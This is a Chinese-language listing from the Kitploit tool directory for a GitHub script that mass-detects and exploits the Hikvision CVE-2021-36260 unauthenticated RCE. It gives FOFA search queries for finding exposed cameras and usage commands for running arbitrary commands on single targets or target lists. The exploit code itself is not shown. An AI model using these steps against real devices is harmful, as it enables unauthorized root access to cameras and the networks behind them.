Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
hikvision-unauthenticated-rce-cve-2021-36260 — 海康威视RCE漏洞 批量检测和利用工具 | Kitploit
工具/GitHubGitHub/yanxinwu946/hikvision-unauthenticated-rce-cve-2021-36260
ReconnaissanceIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubyanxinwu946/hikvision-unauthenticated-rce-cve-2021-36260

hikvision-unauthenticated-rce-cve-2021-36260

海康威视RCE漏洞 批量检测和利用工具

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
37个月前尚未审核

海康威视 CVE-2021-36260 RCE 漏洞

漏洞描述

攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。

FOFA

root@kitploit:~
header="Hikvision"			 
app="HIKVISION-视频监控"

使用方法

root@kitploit:~
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Start scanning url
  -f FILE, --file FILE  read the url from the file
  --check               Check if vulnerable
  --cmd CMD             execute cmd (i.e: "ls -l")

可批量挖掘src

下载工具